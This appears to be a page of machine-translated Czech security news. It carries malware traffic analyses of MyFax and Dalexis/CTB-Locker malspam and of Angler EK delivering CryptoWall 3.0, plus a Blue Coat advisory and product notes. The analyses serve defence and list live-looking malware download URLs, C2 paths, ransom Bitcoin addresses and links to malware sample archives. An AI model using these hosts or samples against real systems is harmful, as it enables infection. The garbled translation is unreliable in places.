[2] https://isc.sans.edu/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681
[3] https://isc.sans.edu/diary/Angler+exploit+kit+pushing+CryptoWall+30/19737
[4] https://isc.sans.edu/diary/Actor+using+Fiesta+exploit+kit/19631
[5] https://isc.sans.edu/diary/Exploit+Kit+Evolution+Neutrino/19283
[6] http://www.rackspace.com/blog/in-2015-operation-windigo-is-still-going-strong/
[7] http://www.kahusecurity.com/2014/rig-exploit-pack/
[8] http://malware-traffic-analysis.net/2015/05/06/index2.html


MyFax malspam vlna s odkazy na malware a Neutrino využívat kit

3.6.2015 Viry
Úvod

Již středu 2015-05-27, tam byli více vlny škodlivého spamu (malspam) spoofing myfax.com. V úterý 06.2.2015, zprávy obsahovaly odkazy na zip archivu jednoho Pony downloader. Úterní zprávy také měl odkazy tlačí Neutrino využívat kit (EK). Spoofed MyFax e-maily nejsou ničím novým. Už už léta. Jedná se o další vlna v nepřetržitém náporem malspam, že organizace čelí každý den.

Pozadí

Dříve na 06.2.2015, Techhelplistcom tweeted o MyFax malspam našel [ 1 ], a on posílal odkazy z těchto e-mailů do Pastebin [ 2 ].


Všiml jsem si, podobné zprávy minulý týden, ale oni byli všichni blokovány. V té době jsem nebyl schopen dále zkoumat jakékoliv. Na 6.2.2015, kontrola spamové filtry můj zaměstnavatel odhalil falešné MyFax zprávy byly po 3 dny přestávky přichází znovu.


Podrobnosti

Níže je příklad zpráv blokovaných spam filtry mé organizace na 06.2.2015:

Nahoře: MyFax tématikou malspam z úterku 06.2.2015

Výše uvedený příklad ukazuje 2 typy adres URL. První body do souboru zip. Druhé poukazuje na adresy URL, které končí v fax.php že tlačí Neutrino EK. Minulý týden malspam měla pouze odkazy na zip souborů.

Nahoře: MyFax-tématickém malspam od čtvrtka, 2015-05-28

V laboratorním prostředí, tyto vazby konče fax.php vrátil HTML s iframe vedoucí k Neutrino EK.


Bohužel, nebyl jsem schopen generovat žádnou Neutrino EK provoz. Názvy domén pro neutrina adres URL nevyřeší v DNS provozu.


Viděli jsme následující fax.php adresy URL z malspam:

chuotbu.com - GET /wp-content/plugins/feedweb_data/fax.php
www.faura-casas.com - GET /wp-content/plugins/feedweb_data/fax.php
Také jsme zjistili, že tyto adresy URL pro zip souborů z malspam:

sv.com.vn - GET /wp-content/plugins/feedweb_data/pdf_efax_message_3537462.zip
edenika.net - GET /wp-content/plugins/cached_data/pdf_fax_message238413995.zip
edujay.com - GET /wp-content/plugins/cached_data/pdf_fax_message238413995.zip
eciusda.org - GET /wp-content/plugins/cached_data/pdf_fax_message238413995.zip
nightskyhotel.com - GET /wp-content/plugins/feedweb_data/incoming_myfax_doc.zip
sciclubtermeeuganee.it - ​​GET /wp-content/plugins/feedweb_data/pdf_efax_message_3537462.zip
serenityonthesquare.com - GET /wp-content/plugins/cached_data/pdf_efax_message_3537462.zip
vanepcanhcuong.com - GET /modules/mod_vvisit_counter/images/digit_counter/embwhite/pdf_efax_message_3537462.zip
www.ditta-argentiero.it - ​​GET /wp-content/plugins/feedweb_data/pdf_efax_message_3537462.zip
Tady je to, co jsme viděli v laboratorním prostředí při stahování souboru zip, extrahování malware, a infikování hostitele systému Windows:

Klikněte na obrázek pro zobrazení v plné velikosti

Indikátory kompromisu (IOC) z infekce dopravy:

112.78.2.223 - nightskyhotel.com - GET /wp-content/plugins/feedweb_data/incoming_myfax_doc.zip HTTP / 1.1
78.136.221.141 - moskalvtumane.com POST /gate.php HTTP / 1.0
94.73.151.210 - mechgag.com - GET /wp-content/plugins/feedweb_data/k1.exe HTTP / 1.0
87.250.250.8 - yandex.ru - GET / HTTP / 1.1
93.158.134.3 - www.yandex.ru - GET / HTTP / 1.1
213.152.181.66 - dortwindfayer.com - GET /confk.jpg HTTP / 1.1
213.152.181.66 - dortwindfayer.com - GET /ki.exe HTTP / 1.1
213.152.181.66 - dortwindfayer.com - GET /ki.exe HTTP / 1.1
213.152.181.66 - dortwindfayer.com- POST /gate.php HTTP / 1.1
213.152.181.66 - dortwindfayer.com - GET /confk.jpg HTTP / 1.1
213.152.181.66 - dortwindfayer.com - GET /ki.exe HTTP / 1.1
213.152.181.66 - dortwindfayer.com - GET /ki.exe HTTP / 1.1
213.152.181.66 - dortwindfayer.com - POST /gate.php HTTP / 1.1
213.152.181.66 - dortwindfayer.com - GET /confk.jpg HTTP / 1.1
Obrázek níže ukazuje vznikajících hrozeb založené na Snortu události na infekce dopravy s použitím zabezpečení Cibule . Tyto události označují Fareit / Pony downloader infikován laboratoři hostitele s Graftor nebo Zeus / Zbot varianty.


Vzorek pony downloader byl předložen k malwr.com na: https://malwr.com/analysis/ODExOWNlY2Y4N2QwNDhkNmE4YmFkODc2ODA3NzlkNDI/

Vzorek follow-up malwaru byl také předložen k malwr.com na: https://malwr.com/analysis/OTc4MWY3OTdmZDZkNGYxMGJhNGRkMDAzOThlNmQ1NmI/

Post-infekce provoz obsahuje HTTP GET požadavky na malé obrazový soubor s obrazem Marlon Brando od kmotra filmů. Matthew Mesa našel nějaké jiné adresy URL s (to, co předpokládám, že je), stejný obrázek [ 3 ].


Obraz obsahuje nějaký text ASCII pro poslední 1,4kilobajt nebo tak souboru, což znamená, steganografie je používán poslat nějaké informace do infikovaného počítače.


Závěrečná slova

Pcap z 06.02.2015 infekce provoz je k dispozici na adrese:

http://malware-traffic-analysis.net/2015/06/02/2015-06-02-myfax-malspam-infection-traffic.pcap
Zip soubor přidružené malware je na adrese:

http://malware-traffic-analysis.net/2015/0 6 / 02 / 2015-06 -02 -myfax-malspam -artifacts.zip
Zip soubor je chráněn heslem se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.

Zvláštní poděkování patří Techhelplist a Matthew Mesa pro své Twitter příspěvků o této činnosti. Techhelplist také aktualizoval svůj blog záznam o falešných MyFax e-mailů s tímto nejnovějších informací [ 4 ].

---
Brad Duncan
ISC Handler a bezpečnostní výzkumník u Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic

Reference :

[1] https://twitter.com/Techhelplistcom/status/605765844258287618
[2] http://pastebin.com/0WXz209K
[3] http://pastebin.com/x6U940wj
[4] https://techhelplist.com/index.php/spam-list/ 125-inbound-fax-fake-myfax-notification


Dalexis / CTB-Locker malspam kampaň

2.6.2015 Viry
Malware Every Day

Škodlivý spam (malspam), je podle zaslané botnety každý den. Tyto malspam kampaně poslat malware navržen tak, aby infikovat počítače Windows. Uvidím Dridex nebo Upatre / Dyre kampaně denní bázi. Naštěstí, většina z těchto e-mailů jsou blokovány našimi spam filtry.

 

Co je Dalexis / CTB-Locker?

Dalexis je malware downloader. To kapky soubor CAB s vloženým dokumentem, který je otevřen v počítači uživatele [ 1 ], poté stáhne další malware. Dalexis se často používá k doručování CTB-Locker [ 2 ] [ 3 ]. CTB-Locker je ransomware který šifruje soubory na vašem počítači. Výměnou za platbu výkupného, ​​bude malware autoři poskytují klíč k dešifrování souborů. Chování tohoto malware je dobře zdokumentováno, ale malé změny se často objevují jako nové vlny malspam jsou rozeslány.

Podobný vlna malspam od pondělí 2015-04-27 uvedlo techhelplist.com [ 4 ]. Další den viděl podobnou aktivitu. Tato kampaň bude pravděpodobně pokračovat. Níže je vývojový diagram z úterních vlny Dalexis / CTB-Locker malspam:


Zprávy mají mírně odlišné předmět linky, a každý přílohu e-mailu má jiný soubor hash. Nakažený jsem spoustu pomocí jedné z příloh. Níže jsou uvedeny odkazy na související soubory:

Vytěžené malware (Dalexis downloader): https://malwr.com/analysis/OTVjMzRjZDFjNWYwNDlmYzk4MTVmOWRlM2IzMmVkN2Y/
CTB-Locker stažen Dalexis: https://malwr.com/analysis/M2NlYmU3YmIwMzM0NGY1NTk4MTBjMzM0ZmZmZmZmZTE/
PCAP z infikovaného hostitele (10,8 MB): http://www.malware-traffic-analysis.net/2015/04/28/2015-04-28-Dalexis-and-CTB-Locker-traffic.pcap
ZIP soubor 24 Dalexis vzorků z této malspam vlny: http://www.malware-traffic-analysis.net/2015/04/28/2015-04-28-Dalexis-samples.zip
ZIP soubor je chráněn heslem se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.

Infekce jak je patrné z plochy

Vyňato malware z těchto e-mailových příloh je soubor SCR s ikonou aplikace Excel. Následující obrázek ukazuje, co se stalo hned po otevření této Dalexis malware na ploše:


O několik minut později, desktop vykazuje známky infekce CTB-Locker:


Pokyny pro dešifrování souborů jsou uvedeny níže:

 

Musel stáhnout prohlížeč Tor se dostat na informace dešifrování. Bitcoin adresa pro výplatu výkupného je: 18GuppWVuZGqutYvZz9uaHxHcostrU6Upc (zkontrolujte zde zjistit, zda byly všechny transakce byly provedeny v tomto Bitcoin účtu).


Provoz z infikovaného hostitele

Níže je obrázek z Sguil na bezpečnostní cibulkou pro některé z EmergingThreats a ETPRO Snort akcích viděl během této infekce:


Dalexis používá požadavek GET stáhnout CTB-Locker. Soubor je zašifrován v tranzitu, ale vyvolány jsem dešifrovat kopii z infikovaného počítače. Dalexis hlásí k velení a řízení (CNC) serveru po malware je úspěšně stažen.

V níže uvedeném obrázku, zjistíte, HTTP POST požadavky na různých serverech jako Dalexis se snaží najít CNC server, který bude reagovat. Tento vzorek Dalexis udělal 124 HTTP POST požadavky před serveru konečně odpověděl s 200 OK.


U ukazatelů kompromis (IOCs), seznam domén jedinečných k této infekce takto:

(Přečtěte si: IP adresa - název domény)

31.170.160.229 - earthfromspace.host56.com
31.170.162.163 - gkl.net76.net
37.187.72.60 - volcanoscreens.com
46.19.37.108 - ip.telize.com
62.149.140.213 - www.gaglianico74.it
85.10.55.30 - lancia.hr
192.185.224.67 - bdfschool.net
různé - fizxfsi3cad3kn7v.tor2web.org
různé - fizxfsi3cad3kn7v.onion.cab

Příklad Malspam od úterý 2015-04-28

Od: Eda Uhrhammer
Datum: úterý 28 duben 2015 v 16:16 UTC
K: [redigován]
Předmět: [Issue 5261CC6247C37550] Účet # 295030013990 dočasně uzamčen

Vážený uživateli,

My odhalit neoprávněné pokusy o přihlášení k vašemu ID # 295030013990 z ostatních IP adresa.
Prosíme znovu potvrďte svou identitu. Viz přiložené dokumenty pro úplné informace.

===
Eda Uhrhammer
Millard Peter
111 Hunter Street East, Peterborough, ON K9H 1G7

CANADA
705-759-7751

Příloha : 295030013990.zip

POZNÁMKA: E-maily obsahují různé mezinárodní jména, adresy a telefonní čísla v bloku podpisu.

E-maily Collected

Čas začátku: 2015-04-28 10:00:13 UTC
Konečný čas: 2015-04-28 16:16:28 UTC
našel e-maily: 24

Odesílatelé a Předmět Lines

Odesílatel: chronogram@dorhotels.com - Téma: [Problém 35078504EBA94667] Účet # 59859805294 dočasně uzamčen
Odesílatel: sandwiched@upaf.net - Téma: [Problém 84908E27DF477852] Účet # 40648428303 dočasně uzamčen
Odesílatel: stashed@wudata.com - Téma: [Problém 8694097116D18193] Účet # 257547165590 dočasně uzamčen
Odesílatel: wildcatting@atelier122.com - Téma: [Problém 11123E749D533902] Účet # 621999149649 dočasně uzamčen
Odesílatel: blackens@mpzmail.com - Téma: [Problém 24789101648C8407] Účet # 250874039146 dočasně uzamčen
Odesílatel: kami@corexsud.com - Téma: [Problém 6412D16736356564] Účet # 238632826769 dočasně uzamčen
Odesílatel: rasped@rhfs.com - Téma: [Problém 9139F9678C9A7466] Účet # 216021389500 dočasně uzamčen
Odesílatel: jingly@proxis.com - Téma: [Problém 982886631E9E7489] Účet # 114654416120 dočasně uzamčen
Odesílatel: exaggerating@cfilc.org - Téma: [Problém 4895D8D81ADE1399] Účet # 843871639720 dočasně uzamčen
Odesílatel: achaea@staes.com - Téma: [Problém 72986FD85CE93134] Účet # 622243029178 dočasně uzamčen
Odesílatel: wharves@be.grayling.com - Téma: [Problém 27883AA546718876] Účet # 475770363394 dočasně uzamčen
Odesílatel: busheling@abbiegram.net - Téma: [Problém 5384A21F5AB26075] Účet # 717973552140 dočasně uzamčen
Odesílatel: megacephaly@ielmalta.com - Téma: [Problém 5694B0643FCD587] Účet # 642271991381 dočasně uzamčen
Odesílatel: fervorless@timocom.com - Téma: [Problém 8219423F8CFB6864] Účet # 692223104314 dočasně uzamčen
Odesílatel: pickles@fei.org - Téma: [Problém 70308834A3929842] Účet # 339648082242 dočasně uzamčen
Odesílatel: swartz@johndesmond.com - Téma: [Problém 33190977A2D04088] Účet # 831865092451 dočasně uzamčen
Odesílatel: voluntaryism@isporven.com - Téma: [Problém 706584024E142555] Účet # 196387638377 dočasně uzamčen
Odesílatel: catalysts@sefurmadrid.com - Téma: [Problém 830689BB76F4615] Účet # 162723085828 dočasně uzamčen
Odesílatel: phytane@arboris-us.com - Téma: [Problém 46714D12FB834480] Účet # 526735661562 dočasně uzamčen
Odesílatel: pollinises@hanh-ct.org - Téma: [Problém 39494AFE933A5158] Účet # 552561607876 dočasně uzamčen
Odesílatel: resents@arkastravel.com - Téma: [Problém 974641F53DD66126] Účet # 325636779394 dočasně uzamčen
Odesílatel: addled@dorhotels.com - Téma: [Problém 7505716EA6244832] Účet # 603263972311 dočasně uzamčen
Odesílatel: oology@mouzaliotis.com - Téma: [Problém 50438E220A5D7432] Účet # 906152957589 dočasně uzamčen
Odesílatel: delighter@alabaisse.com - Téma: [Problém 5261CC6247C37550] Účet # 295030013990 dočasně uzamčen
Poznámka: odesílání e-mailové adresy by mohly být falešné.

Přílohy

114654416120.zip - 19135 bytů - MD5 hash: 1a9fdce6b6efd094af354a389b0e04da
162723085828.zip - 20688 bytů - MD5 hash: a1b066361440a5ff6125f15b1ba2e1b1
196387638377.zip - 20681 bytů - MD5 hash: 01f8976034223337915e4900b76f9f26
216021389500.zip - 19135 bytů - MD5 hash: ab9a07054a985c6ce31c7d53eee90fbe
238632826769.zip - 19135 bytů - MD5 hash: 899689538df49556197bf1bac52f1b84
250874039146.zip - 19135 bytů - MD5 hash: eea0fd780ecad755940110fc7ee6d727
257547165590.zip - 19114 bytů - MD5 hash: f236e637e17bc44764e43a8041749e6c
295030013990.zip - 20168 bytů - MD5 hash: eda8075438646c617419eda13700c43a
325636779394.zip - 20177 bytů - MD5 hash: d00861c5066289ea9cca3f0076f97681
339648082242.zip - 20703 bytů - MD5 hash: 657e3d615bb1b6e7168319e1f9c5039f
40648428303.zip - 19113 bytů - MD5 hash: b7fe085962dc7aa7622bd15c3a303b41
475770363394.zip - 20642 bytů - MD5 hash: 2ba4d511e07090937b5d6305af13db68
526735661562.zip - 20710 bytů - MD5 hash: 24698aa84b14c42121f96a22fb107d00
552561607876.zip - 20709 bytů - MD5 hash: 04abf53d3b4d7bb7941a5c8397594db7
59859805294.zip - 19071 bytů - MD5 hash: b2ca48afbc0eb578a9908af8241f2ae8
603263972311.zip - 20175 bytů - MD5 hash: fa43842bda650c44db99f5789ef314e3
621999149649.zip - 19135 bytů - MD5 hash: 802d9abf21c812501400320f2efe7040
622243029178.zip - 20681 bytů - MD5 hash: 0687f63ce92e57a76b990a8bd5500b69
642271991381.zip - 20644 bytů - MD5 hash: 0918c8bfed6daac6b63145545d911c72
692223104314.zip - 20703 bytů - MD5 hash: 2e90e6d71e665b2a079b80979ab0e2cb
717973552140.zip - 20721 bytů - MD5 hash: 5b8a27e6f366f40cda9c2167d501552e
831865092451.zip - 20718 bytů - MD5 hash: 9c1acc3f27d7007a44fc0da8fceba120
843871639720.zip - 20713 bytů - MD5 hash: 1a6b20a5636115ac8ed3c4c4dd73f6aa
906152957589.zip - 20134 bytů - MD5 hash: b9d19a68205f2a7e2321ca3228aa74d1
Extrahované Malware

114654416120.scr - 98304 bytů - MD5 hash: 46838a76fbf59e9b78d684699417b216
162723085828.scr - 90112 bytů - MD5 hash: 8f5df86fdf5f3c8e475357bab7bc38e8
196387638377.scr - 90112 bytů - MD5 hash: 59f71ef10861d1339e9765fb512d991c
216021389500.scr - 98304 bytů - MD5 hash: 0baa21fab10c7d8c64157ede39453ae5
238632826769.scr - 98304 bytů - MD5 hash: f953b4c8093276fbde3cfa5e63f990eb
250874039146.scr - 98304 bytů - MD5 hash: 6580e4ee7d718421128476a1f2f09951
257547165590.scr - 94208 bytů - MD5 hash: 6a15d6fa9f00d931ca95632697e5ba70
295030013990.scr - 86016 bytů - MD5 hash: 54c1ac0d5e8fa05255ae594adfe5706e
325636779394.scr - 94208 bytů - MD5 hash: 08a0c2aaf7653530322f4d7ec738a3df
339648082242.scr - 94208 bytů - MD5 hash: 1aaecdfd929725c195a7a67fc6be9b4b
40648428303.scr - 94208 bytů - MD5 hash: f51fcf418c973a94a7d208c3a8a30f19
475770363394.scr - 81920 bytů - MD5 hash: dbea4b3fb5341ce3ca37272e2b8052ae
526735661562.scr - 94208 bytů - MD5 hash: c0dc49296b0aec09c5bfefcf4129c29b
552561607876.scr - 98304 bytů - MD5 hash: 9239ec6fe6703279e959f498919fdfb0
59859805294.scr - 86016 bytů - MD5 hash: a9d11a69c692b35235ce9c69175f0796
603263972311.scr - 94208 bytů - MD5 hash: bcaf9ce1881f0f282cec5489ec303585
621999149649.scr - 98304 bytů - MD5 hash: 70a63f45eb84cb10ab1cc3dfb4ac8a3e
622243029178.scr - 90112 bytů - MD5 hash: d1b1e371aebfc3d500919e9e33bcd6c1
642271991381.scr - 81920 bytů - MD5 hash: 15a5acfbccbb80b01e6d270ea8af3789
692223104314.scr - 94208 bytů - MD5 hash: fa0fe28ffe83ef3dcc5c667bf2127d4c
717973552140.scr - 98304 bytů - MD5 hash: 646640f63f327296df0767fd0c9454d4
831865092451.scr - 98304 bytů - MD5 hash: ec872872bff91040d2bc1e4c4619cbbc
843871639720.scr - 98304 bytů - MD5 hash: b8e8e3ec7f4d6efee311e36613193b8d
906152957589.scr - 94208 bytů - MD5 hash: 36abcedd5fb6d17038bd7069808574e4

Aktualizace

Krátce poté, co jsem ve složení tato položka deník, techhelplist.com posta článek o tomto konkrétním vlně malspam na 2015-04-28 na: https://techhelplist.com/index.php/spam-list/798-issue-account- dočasně-locked-různé-malware
Malspam Kampaň Dalexis / CTB-Locker pokračovala ve středu 2015-04-29 s řádku předmětu: Váš účet [náhodné číslo] byl zakázán
---
Brad Duncan, bezpečnostní výzkumník u Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic

Reference :

[1] http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader:Win32/Dalexis#tab=2
[2] https://heimdalsecurity.com/blog/ctb-locker-ransomware/
[3] https://blogs.mcafee.com/mcafee-labs/rise-backdoor-fckq-ctb-locker
[4] https://techhelplist.com/index.php/spam-list/796-your-account-has-been-something-bad-various-malware

 

 

Blue Coat: zranitelnosti SSL Viditelnost Appliance web bázi

31.5.2015 Zranitelnosti
Blue Coat vydala informační zpravodaj zabezpečení pro Visibility Appliance SSL. SSL Viditelnost Appliance je náchylná k několika webových zranitelností v administrační konzoli. Vzdálený útočník může použít tyto chyby zabezpečení získat přístup pro správu SSL Viditelnost Appliance. Všechny verze SSL Viditelnost před 3.8.4 jsou zranitelné.

Chyby existují v WebUI jsou:

Žádost o Cross-Site Padělek (CVE-2015-2852): Požadavek Cross-site padělání (CSRF) zranitelnost v komponentě WebUI v Blue Coat SSL viditelnosti spotřebiče SV800, SV1800 SV2800, a SV3800 3.6.x přes 3.8.x před 3,8. 4 umožňuje vzdáleným útočníkům unést ověření správců.

Clickjacking kvůli nevhodnému vstupu validaci (CVE-2015-2854): složka WebUI v Blue Coat SSL viditelnosti spotřebiče SV800, SV1800 SV2800, a SV3800 3.6.x přes 3.8.x před 3.8.4 neodesílá omezující X-Frame -options HTTP hlavičky, která umožňuje vzdáleným útočníkům provádět clickjacking útoky přes vektorů zahrnujících element IFRAME.

Krádež Cookie (CVE-2015-2855): složka WebUI v Blue Coat SSL viditelnosti spotřebiče SV800, SV1800 SV2800, a SV3800 3.6.x přes 3.8.x před 3.8.4 nenastaví zabezpečené příznak pro cookie správce v https zasedání, což usnadňuje vzdáleným útočníkům zachytit tento soubor cookie zachytí jeho přenos v rámci http zasedání, které se jiný zranitelnost CVE-2015-4138, než.

Fixace Session (CVE-2015-2853):. Session fixace zranitelnost v komponentě WebUI v Blue Coat SSL viditelnosti spotřebiče SV800, SV1800 SV2800, a SV3800 3.6.x přes 3.8.x před 3.8.4 umožňuje vzdáleným útočníkům zneužít webových relací tím, že poskytuje ID relace.

Řešení:

Omezit přístup k portu pro správu SSL viditelnost důvěryhodným klientům s omezeným přístupem k vnějšímu internetu. SSLV může být nakonfigurován tak, aby omezení IP adresy, které jsou schopny přístupu k řízení port.

Omezit administrativní kapacity přiřazením odlišné role pro různé typy správců.

Použijte ProxySG a WebPulse zablokovat přístup na nebezpečné webové servery od klientů.

Patche:

SSL Viditelnost
SSLV 3.8 - oprava je k dispozici v 3.8.4.
SSLV 3.8.2f - nebude poskytována oprava. Prosím, upgrade na nejnovější verzi s zranitelnost opravit.
SSLV 3.7.4 - nebude poskytovaných fix. Prosím, upgrade na nejnovější verzi s zranitelnosti oprava.

Pro další podrobnosti:

https://bto.bluecoat.com/security-advisory/sa96
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2852
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2853
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2854
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2855


Betaverze nových bezpečnostních řešení pro domácnosti uvedl Eset

29.5.2015 Software
Nové verze bezpečnostních produktů NOD32 Antivirus 9 a Smart Security 9 nabídnouu vedle nově koncipovaného uživatelského rozhraní nativní ochranu on-line bankovnictví či reputační službu pro weby.

Eset uvolnil k testování betaverze svých bezpečnostních produktů NOD32 Antivirus 9 a Smart Security 9. Jde o produkty určené k ochraně domácích počítačů s operačním systémem Windows.

Smart Security dostal ve verzi 9 novou funkci k ochraně elektronického bankovnictví a platebních transakcí pod názvem Banking & Payment Protection. Ta detekuje, že uživatel přistupuje na stránku elektronického bankovnictví nebo na on-line platební bránu a zajišťuje, že transakce proběhne v zabezpečeném prostředí.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Dalšími inovacemi jsou Reputation Evaluator a Network Signatures. První z nich umožňuje blokovat přístup na stránky a k souborům na základě jejich reputace. Druhá představuje vylepšení ochrany proti botnetu: umožňuje rychlou identifikaci komunikace, která souvisí s botnety a s pokusy o zneužití bezpečnostních mezer (tzv. exploity).

Vedle implementace nových technologií mají oba bezpečnostní produkty zcela nové uživatelské rozhraní, inovovaný proces aktualizací, který umožňuje automatické přidávání nových ochranných funkcí a plnou podporu operačního systému Windows 10.

Oficiální uvolnění produktů se plánuje na konec září 2015


Angler exploit kit pushing CryptoWall 3.0

29.5.2015 Viry

Úvod

V posledních dvou dnech jsem infikován dva počítače z Rybář využít Kit (EK) domén na 216.245.213.0/24. Oba hostitelé byly infikovány CryptoWall 3.0 ransomware použitím stejného Bitcoin adresu pro výplatu výkupného: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB

V úterý, 2015-05-26 v 15:17 UTC, nakažený jsem počítač, kde rybář EK odesláno Bedep jako malware užitečného zatížení, než se dostane CryptoWall 3,0 [ 1 ]. Ve středu, 2015-05-27 v 17:30 UTC, nakažený jsem počítač, kde rybář EK odesláno CryptoWall 3.0 jako malware užitečného zatížení.

Já obvykle vidět rybář EK posílat různé typy ransomware [ 2 , 3 ], a viděl jsem spoustu CryptoWall 3,0 vzorků z velikosti EK; Nicméně, toto je poprvé, co jsem si všiml, CryptoWall od rybář EK.

Nahoře: CryptWall 3.0 dešifrovat pokyny od vzorku 2015-05-27

Provoz z infikovaného hostitele

CryptoWall 3.0 provoz změnila kousek od mého prvního deníku o tom v 2015-01-19 [ 4 ]. Níže Provoz byl viděn z infikovaného hostitele 2015-05-27 začínající v 17:30 UTC.

Nahoře: rybář EK a CryptWall 3.0 provozu, jak je vidět v Wireshark

Přidružené domény:

216.245.213.5 port 80 - vanskeligstesjeverozapadne1.xadultchat.com - Angler EK
91.184.19.41 port 80 - autorijschoolconsistent.nl - CryptoWall 3,0 check-in
213.186.33.50 port 80 - jeanrey.fr - CryptoWall 3,0 check-in
50.62.123.1 port 80 - 3bsgroup.com - CryptoWall 3,0 check-in
75.103.83.9 port 80 - braingame.biz - CryptoWall 3,0 check-in
62.221.204.114 port 80 - alsblueshelpt.nl - CryptoWall 3,0 check-in
184.168.47.225 port 80 - ammorgan.net - CryptoWall 3,0 check-in
79.96.220.223 port 80 - bezpiecznaswinka.pl - CryptoWall 3,0 check-in
148.251.140.60 port 80 - asadiag.com - CryptoWall 3,0 check-in
184.168.47.225 port 80 - alchemyofpresence.com - CryptoWall 3,0 check-in
95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paygateawayoros.com - CryptoWall decrpyt instrukce
95.163.121.105 port 80 - 7oqnsnzwwnm6zb7y.paymentgateposa.com - CryptoWall decrpyt instrukce
7oqnsnzwwnm6zb7y.optionpaymentprak.com (nevyřešil v DNS) - CryptoWall decrpyt instrukce
7oqnsnzwwnm6zb7y.watchdogpayment.com (nevyřešil v DNS) - CryptoWall decrpyt instrukce
Rybář EK:

vanskeligstesjeverozapadne1.xadultchat.com - GET / molehill_inconsolably_erecting_prematureness / 174208500231771131
vanskeligstesjeverozapadne1.xadultchat.com - GET / OEmjzR2jUP6JG0o9h494My_bK-qvpSFR6NcLcwz5j32hxI3s
vanskeligstesjeverozapadne1.xadultchat.com - GET / BjWMS7ksUcb9SztLJX7JlXe95voNnRcc7DfUJzRGbqTqKe8X
CryptoWall 3,0 check-in provozu:

ip-addr.es - GET /
autorijschoolconsistent.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?c=mr3jkiznke20nfh
jeanrey.fr - POST /wp-content/uploads/wpallimport/uploads/3aa8810fe8a85c3aeaf70245feaf0a41/img3.php?w=mr3jkiznke20nfh
3bsgroup.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?t=mr3jkiznke20nfh
braingame.biz - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?x=mr3jkiznke20nfh
alsblueshelpt.nl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?n=mr3jkiznke20nfh
asambleadedios.org - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?z=mr3jkiznke20nfh
ammorgan.net - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?o=mr3jkiznke20nfh
bezpiecznaswinka.pl - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?k=mr3jkiznke20nfh
asadiag.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?q=mr3jkiznke20nfh
alchemyofpresence.com - POST /wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?z=mr3jkiznke20nfh
Poznámka: Tyto adresy URL několikrát opakuje s různými náhodné řetězce na konci.

Dopravní způsobené prohlížení CryptoWall dešifrovat instrukce v prohlížeči:

7oqnsnzwwnm6zb7y.paygateawayoros.com - GET / 1kwN8ko
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/style.css
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/us.png
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/it.png
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rt.png
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/fr.png
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /picture.php?k=1kwn8ko&4d2156f57fb503178f62c2f95690e599
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/rb.png
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/es.png
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/flags/de.png
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lb.png
7oqnsnzwwnm6zb7y.paygateawayoros.com - GET /img/lt.png


Nahoře: vznikajících hrozeb založené na Snortu události na infekce dopravy s použitím zabezpečení Onion

Předběžná analýza malware

Malware užitečné zatížení dodává rybář EK dne 2015-05-27:

Velikost souboru: 232,5 kilobajt (238080 bytes)
MD5 hash: 30ca927d6e800177937788703fc87301
Poměr detekce: 2/57
První předložen: 2015-05-27 19:15:02 UTC
https://www.virustotal.com/en/file/086a992a8525d3126a6ac7bb29360739d591c672a8099d4be8faa3fc95651792/analysis/
https://malwr.com/analysis/NGFmYjBiYmQ0N2M2NGExNDhlOTA0OWMzMDk1ZDg5MzM/
https://www.hybrid-analysis.com/sample/086a992a8525d3126a6ac7bb29360739d591c672a8099d4be8faa3fc95651792?environmentId=2
Závěrečná slova

Pcap z 2015-05-27 infekce provoz je k dispozici na adrese:

http://malware-traffic-analysis.net/2015/05/27/2015-05-27-Angler-EK-and-CryptoWall-3.0-infection.pcap
Zip soubor přidružené malware je k dispozici na adrese:

http://malware-traffic-analysis.net/2015/05/27/2015-05-27-Angler-EK-and-CryptoWall-3.0-malware.zip
Zip soubor je chráněn heslem se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.

---
Brad Duncan
ISC Handler a bezpečnostní výzkumník u Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic

Reference :

[1] http://malware-traffic-analysis.net/2015/05/26/index.html
[2] https://isc.sans.edu/diary/Angler+exploit+kit+pushes+new+variant+of+ransomware/19681
[3] http://malware-traffic-analysis.net/2015/03/25/index.html
[4] https://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203


Sophos prý jako první nabízí UTM s podporou Wi-Fi 802.11ac

26.5.2015 Hardware
Wi-Fi standardu IEEE 802.11ac integroval do svých UTM firewallů Sophos. Dokáže tak podle svých slov jako první chránit před hrozbami i uživatele těchto sítí.

